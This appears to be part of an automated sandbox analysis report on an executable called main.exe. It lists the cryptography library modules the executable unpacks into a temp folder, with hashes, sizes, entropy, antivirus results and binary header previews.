                                                                                                                                                                                                                                                                              SHA-512:8B6FB53AECB514769985EBFDAB1B3C739024597D9C35905E04971D5422256546F7F169BF98F9BAF7D9F42A61CFF3EE7A20664989D3000773BF5EDA10CB3A0C24
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                                                                              • Filename: chos.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                              • Filename: ihost.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                              • Filename: shost.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                              • Filename: lz4wnSavmK.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                              • Filename: WVuXCNNYG0.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                              • Filename: dipwo1iToJ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                              • Filename: ROh2ijuEpr.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                              • Filename: zed.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                              • Filename: back.ps1, Detection: malicious, Browse
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d...Y..f.........." ................P........................................p............`..........................................'......0(..d....P.......@...............`..(....!...............................!..8............ ...............................text............................... ..`.rdata..Z.... ......................@..@.data...H....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..(....`.......*..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_Salsa20.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):13824
                                                                                                                                                                                                                                                                              Entropy (8bit):5.0194545642425075
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:4t/1nCuqaL0kt7AznuRmceS4lDFhAlcqgcLg:F/k1ACln4lDogcLg
                                                                                                                                                                                                                                                                              MD5:F19CB847E567A31FAB97435536C7B783
                                                                                                                                                                                                                                                                              SHA1:4C8BFE404AF28C1781740E7767619A5E2D2FF2B7
                                                                                                                                                                                                                                                                              SHA-256:1ECE1DC94471D6977DBE2CEEBA3764ADF0625E2203D6257F7C781C619D2A3DAD
                                                                                                                                                                                                                                                                              SHA-512:382DC205F703FC3E1F072F17F58E321E1A65B86BE7D9D6B07F24A02A156308A7FEC9B1A621BA1F3428FD6BB413D14AE9ECB2A2C8DD62A7659776CFFDEBB6374C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                                                                              • Filename: chos.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                              • Filename: ihost.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                              • Filename: shost.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                              • Filename: lz4wnSavmK.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                              • Filename: WVuXCNNYG0.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                              • Filename: dipwo1iToJ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                              • Filename: ROh2ijuEpr.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                              • Filename: zed.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                              • Filename: back.ps1, Detection: malicious, Browse
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...Z..f.........." ................P.....................................................`..........................................8......H9..d....`.......P..L............p..(....1...............................1..8............0...............................text...h........................... ..`.rdata..r....0......................@..@.data...H....@.......,..............@....pdata..L....P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_chacha20.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):13312
                                                                                                                                                                                                                                                                              Entropy (8bit):5.037456384995606
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:st/1nCuqaL0ktPMn1ENe3erKr5br0YbsiDw6a9lkOcqgRGd:p/kpMIodrXbsiDS95gRGd
                                                                                                                                                                                                                                                                              MD5:DC14677EA8A8C933CC41F9CCF2BEDDC1
                                                                                                                                                                                                                                                                              SHA1:A6FB87E8F3540743097A467ABE0723247FDAF469
                                                                                                                                                                                                                                                                              SHA-256:68F081E96AE08617CF111B21EDED35C1774A5EF1223DF9A161C9445A78F25C73
                                                                                                                                                                                                                                                                              SHA-512:3ABA4CFCBBE4B350AB3230D488BD75186427E3AAAF38D19E0E1C7330F16795AD77FB6E26FF39AF29EAF4F5E8C42118CB680F90AFBFCA218AEDA64DC444675BA2
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...Z..f.........." ................P.....................................................`......................................... 8.......8..d....`.......P..d............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......*..............@....pdata..d....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..(....p.......2..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_pkcs1_decode.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):14336
                                                                                                                                                                                                                                                                              Entropy (8bit):5.09191874780435
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:rMVsiXeqVb0lIb0Pj5Jdfpm68WZDInU282tacqgYLg:rM7ali0Pj5JxCaDuUlgYLg
                                                                                                                                                                                                                                                                              MD5:C09BB8A30F0F733C81C5C5A3DAD8D76D
                                                                                                                                                                                                                                                                              SHA1:46FD3BA87A32D12F4EE14601D1AD73B78EDC81D1
                                                                                                                                                                                                                                                                              SHA-256:8A1B751DB47CE7B1D3BD10BEBFFC7442BE4CFB398E96E3B1FF7FB83C88A8953D
                                                                                                                                                                                                                                                                              SHA-512:691AC74FAE930E9CEABE782567EFB99C50DD9B8AD607DD7F99A5C7DF2FA2BEB7EDFE2EBB7095A72DA0AE24E688FBABD340EAE8B646D5B8C394FEE8DDD5E60D31
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^:.6?T.6?T.6?T.?G..2?T.dJU.4?T.}GU.5?T.6?U..?T.dJQ.<?T.dJP.>?T.dJW.5?T..J\.7?T..JT.7?T..J..7?T..JV.7?T.Rich6?T.........................PE..d...X..f.........." ................P.....................................................`.........................................`8.......8..d....`.......P..(............p..(....1...............................1..8............0...............................text............................... ..`.rdata..6....0....... ..............@..@.data...x....@......................@....pdata..(....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..(....p.......6..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_aes.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):36352
                                                                                                                                                                                                                                                                              Entropy (8bit):6.541423493519083
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:f/UlZA5PUEllvxL/7v/iKBt5ByU0xGitqzSEkxGG7+tpKHb/LZ7fr52EkifcMxme:klcR7JriEbwDaS4j990th9VDBV
                                                                                                                                                                                                                                                                              MD5:0AB25F99CDAACA6B11F2ECBE8223CAD5
                                                                                                                                                                                                                                                                              SHA1:7A881B3F84EF39D97A31283DE6D7B7AE85C8BAE6
                                                                                                                                                                                                                                                                              SHA-256:6CE8A60D1AB5ADC186E23E3DE864D7ADF6BDD37E3B0C591FA910763C5C26AF60
                                                                                                                                                                                                                                                                              SHA-512:11E89EEF34398DF3B144A0303E08B3A4CAF41A9A8CA618C18135F561731F285F8CF821D81179C2C45F6EEB0E496D9DD3ECF6FF202A3C453C80AFEF8582D06C17
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d...V..f.........." .....H...H......P.....................................................`.........................................p...........d...............................0......................................8............`...............................text...xG.......H.................. ..`.rdata.."6...`...8...L..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..0...........................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_aesni.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):15360
                                                                                                                                                                                                                                                                              Entropy (8bit):5.367749645917753
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:YiJBj5fq/Rk0kPLhOZ3UucCWuSKPEkA2bD9JXx03cqg5YUMLgs:/k1kTMZEjCWNaA2DTx0g5YUMLg
                                                                                                                                                                                                                                                                              MD5:B6EA675C3A35CD6400A7ECF2FB9530D1
                                                                                                                                                                                                                                                                              SHA1:0E41751AA48108D7924B0A70A86031DDE799D7D6
                                                                                                                                                                                                                                                                              SHA-256:76EF4C1759B5553550AB652B84F8E158BA8F34F29FD090393815F06A1C1DC59D
                                                                                                                                                                                                                                                                              SHA-512:E31FD33E1ED6D4DA3957320250282CFD9EB3A64F12DE4BD2DFE3410F66725164D96B27CAA34C501D1A535A5A2442D5F070650FD3014B4B92624EE00F1C3F3197
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.z.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...V..f.........." ......... ......P.....................................................`..........................................9......$:..d....`.......P...............p..(....1...............................1..8............0.. ............................text............................... ..`.rdata.......0......."..............@..@.data...8....@.......2..............@....pdata.......P.......4..............@..@.rsrc........`.......8..............@..@.reloc..(....p.......:..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_arc2.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                                                                                                              Entropy (8bit):5.41148259289073
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:w3d9FkHaz0EJvrj+CYuz7ucc9dG7otDr22KcqgOiewZjW:YkHEJzj+X6769lDzagO/w
                                                                                                                                                                                                                                                                              MD5:F14E1AA2590D621BE8C10321B2C43132
                                                                                                                                                                                                                                                                              SHA1:FD84D11619DFFDF82C563E45B48F82099D9E3130
                                                                                                                                                                                                                                                                              SHA-256:FCE70B3DAFB39C6A4DB85D2D662CB9EB9C4861AA648AD7436E7F65663345D177
                                                                                                                                                                                                                                                                              SHA-512:A86B9DF163007277D26F2F732ECAB9DBCA8E860F8B5809784F46702D4CEA198824FDEF6AB98BA7DDC281E8791C10EABA002ABDA6F975323B36D5967E0443C1E4
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...W..f.........." ....."... ......P.....................................................`.........................................pI.......J..d....p.......`..................(....B...............................B..8............@...............................text...( .......".................. ..`.rdata..<....@.......&..............@..@.data...H....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..(............>..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_blowfish.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):20992
                                                                                                                                                                                                                                                                              Entropy (8bit):6.041302713678401
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:kUX0JfbRz5MLZA0nmwzMDYpJgLa0Mp8NDBcxgprAM:6NbRzWXwDqgLa1uBfP
                                                                                                                                                                                                                                                                              MD5:B127CAE435AEB8A2A37D2A1BC1C27282
                                                                                                                                                                                                                                                                              SHA1:2A7BF8BF7F24B2381370BA6B41FB640EE42BDCCD
                                                                                                                                                                                                                                                                              SHA-256:538B1253B5929254ED92129FA0957DB26CDDF34A8372BA0BF19D20D01549ADA3
                                                                                                                                                                                                                                                                              SHA-512:4FE027E46D5132CA63973C67BD5394F2AC74DD4BBCFE93CB16136FAB4B6BF67BECB5A0D4CA359FF9426DA63CA81F793BBF1B79C8A9D8372C53DCB5796D17367E
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...W..f.........." .....$...0......P.....................................................`.........................................0Y.......Y..d............p..................0....Q...............................R..8............@...............................text....".......$.................. ..`.rdata.......@... ...(..............@..@.data...H....`.......H..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc..0............P..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cast.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):24576
                                                                                                                                                                                                                                                                              Entropy (8bit):6.530656045206549
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:cEDwUBi9SPu71omZXmrfXA+UA10ol31tuXVYdAgYj:FsUBXmoEXmrXA+NNxWFYfo
                                                                                                                                                                                                                                                                              MD5:2E15AA6F97ED618A3236CFA920988142
                                                                                                                                                                                                                                                                              SHA1:A9D556D54519D3E91FA19A936ED291A33C0D1141
                                                                                                                                                                                                                                                                              SHA-256:516C5EA47A7B9A166F2226ECBA79075F1A35EFFF14D87E00006B34496173BB78
                                                                                                                                                                                                                                                                              SHA-512:A6C75C4A285753CC94E45500E8DD6B6C7574FB7F610FF65667F1BEC8D8B413FC10514B7D62F196C2B8D017C308C5E19E2AEF918021FA81D0CB3D8CED37D8549A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...W..f.........." .....$...>............................................................`..........................................h.......i..d...............................0....a...............................a..8............@...............................text....#.......$.................. ..`.rdata..:-...@.......(..............@..@.data...H....p.......V..............@....pdata...............X..............@..@.rsrc................\..............@..@.reloc..0............^..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cbc.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                                                                                              Entropy (8bit):4.7080156150187396
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:lF/1n7Guqaj0ktfEJwX1fYwCODR3lncqg0Gd6l:RGXkJEm1feODxDg0Gd6
                                                                                                                                                                                                                                                                              MD5:40390F2113DC2A9D6CFAE7127F6BA329
                                                                                                                                                                                                                                                                              SHA1:9C886C33A20B3F76B37AA9B10A6954F3C8981772
                                                                                                                                                                                                                                                                              SHA-256:6BA9C910F755885E4D356C798A4DD32D2803EA4CFABB3D56165B3017D0491AE2
                                                                                                                                                                                                                                                                              SHA-512:617B963816838D649C212C5021D7D0C58839A85D4D33BBAF72C0EC6ECD98B609080E9E57AF06FA558FF302660619BE57CC974282826AB9F21AE0D80FBAA831A1
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...X..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..(....p......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cfb.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):12800
                                                                                                                                                                                                                                                                              Entropy (8bit):5.159963979391524
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:kblRgfeqfz0RP767fB4A84DgVD6eDcqgzbkLgmf:BwRj67p84Dg6eVgzbkLgmf
                                                                                                                                                                                                                                                                              MD5:899895C0ED6830C4C9A3328CC7DF95B6
                                                                                                                                                                                                                                                                              SHA1:C02F14EBDA8B631195068266BA20E03210ABEABC
                                                                                                                                                                                                                                                                              SHA-256:18D568C7BE3E04F4E6026D12B09B1FA3FAE50FF29AC3DEAF861F3C181653E691
                                                                                                                                                                                                                                                                              SHA-512:0B4C50E40AF92BC9589668E13DF417244274F46F5A66E1FC7D1D59BC281969BA319305BECEA119385F01CC4603439E4B37AFA2CF90645425210848A02839E3E7
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^..6?..6?..6?..?G..2?..dJ..4?..}G..5?..6?...?..dJ..<?..dJ..>?..dJ..5?...J..7?...J..7?...Jk.7?...J..7?..Rich6?..................PE..d...Y..f.........." ................P.....................................................`..........................................8......x9..d....`.......P..d............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......(..............@....pdata..d....P.......*..............@..@.rsrc........`......................@..@.reloc..(....p.......0..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ctr.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):14848
                                                                                                                                                                                                                                                                              Entropy (8bit):5.270418334522813
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:vktJ1gifqQGRk0IP73AdXdmEEEEEm9uhiFEQayDZVMcqgnF6+6Lg:vkdU1ID3AdXd49urQPDggnUjLg
                                                                                                                                                                                                                                                                              MD5:C4C525B081F8A0927091178F5F2EE103
                                                                                                                                                                                                                                                                              SHA1:A1F17B5EA430ADE174D02ECC0B3CB79DBF619900
                                                                                                                                                                                                                                                                              SHA-256:4D86A90B2E20CDE099D6122C49A72BAE081F60EB2EEA0F76E740BE6C41DA6749
                                                                                                                                                                                                                                                                              SHA-512:7C06E3E6261427BC6E654B2B53518C7EAA5F860A47AE8E80DC3F8F0FED91E122CB2D4632188DC44123FB759749B5425F426CD1153A8F84485EF0491002B26555
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^z.6?..6?..6?..?G..2?..dJ..4?..}G..5?..6?...?..dJ..<?..dJ..>?..dJ..5?...J..7?...J..7?...J..7?...J..7?..Rich6?..........................PE..d...Y..f.........." ......... ......P.....................................................`.........................................`9.......:..d....`.......P...............p..(....1...............................1..8............0.. ............................text............................... ..`.rdata.......0....... ..............@..@.data........@.......0..............@....pdata.......P.......2..............@..@.rsrc........`.......6..............@..@.reloc..(....p.......8..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_des.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):56832
                                                                                                                                                                                                                                                                              Entropy (8bit):4.231032526864278
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:0qcmHBeNL1dO/qHkpnYcZiGKdZHDLY84vnKAnK2rZA21agVF:fEiqHHx4vZDV
                                                                                                                                                                                                                                                                              MD5:F9E266F763175B8F6FD4154275F8E2F0
                                                                                                                                                                                                                                                                              SHA1:8BE457700D58356BC2FA7390940611709A0E5473
                                                                                                                                                                                                                                                                              SHA-256:14D2799BE604CBDC668FDE8834A896EEE69DAE0E0D43B37289FCCBA35CEF29EC
                                                                                                                                                                                                                                                                              SHA-512:EB3E37A3C3FF8A65DEF6FA20941C8672A8197A41977E35AE2DC6551B5587B84C2703758320559F2C93C0531AD5C9D0F6C36EC5037669DC5CE78EB3367D89877B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........PK..1%..1%..1%..I...1%.D$..1%.I$..1%..1$..1%.D ..1%.D!..1%.D&..1%..D-..1%..D%..1%..D...1%..D'..1%.Rich.1%.........................PE..d...X..f.........." .....6...................................................0............`.................................................\...d...............l............ ..0... ...............................@...8............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...H...........................@....pdata..l...........................@..@.rsrc...............................@..@.reloc..0.... ......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_des3.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):57344
                                                                                                                                                                                                                                                                              Entropy (8bit):4.252429732285762
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:J4cmHBeIzNweVy/CHkRnYcZiGKdZHDLq80vnKAnKBrZGsURygUX:GEO6CHnX0vZb7
                                                                                                                                                                                                                                                                              MD5:DECF524B2D53FCD7D4FA726F00B3E5FC
                                                                                                                                                                                                                                                                              SHA1:E87C6ED4004F2772B888C5B5758AA75FE99D2F6F
                                                                                                                                                                                                                                                                              SHA-256:58F7053EE70467D3384C73F299C0DFD63EEF9744D61D1980D9D2518974CA92D4
                                                                                                                                                                                                                                                                              SHA-512:EAFF4FD80843743E61CE635FBADF4E5D9CF2C3E97F3C48350BD9E755F4423AC6867F9FE8746BD5C54E1402B18E8A55AEEF7ACA098C7CF4186DC4C1235EB35DF2
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........PK..1%..1%..1%..I...1%.D$..1%.I$..1%..1$..1%.D ..1%.D!..1%.D&..1%..D-..1%..D%..1%..D...1%..D'..1%.Rich.1%.........................PE..d...X..f.........." .....8...................................................0............`.....................................................d............................ ..0... ...............................@...8............P...............................text...X7.......8.................. ..`.rdata......P.......<..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..0.... ......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ecb.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                                                                                              Entropy (8bit):4.690163963718492
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:Yddz2KTnThIz0qfteRY4zp+D3PLui8p1cqgHCWt:k2E9RqfCXp+D3juRpLgiWt
                                                                                                                                                                                                                                                                              MD5:80BB1E0E06ACAF03A0B1D4EF30D14BE7
                                                                                                                                                                                                                                                                              SHA1:B20CAC0D2F3CD803D98A2E8A25FBF65884B0B619
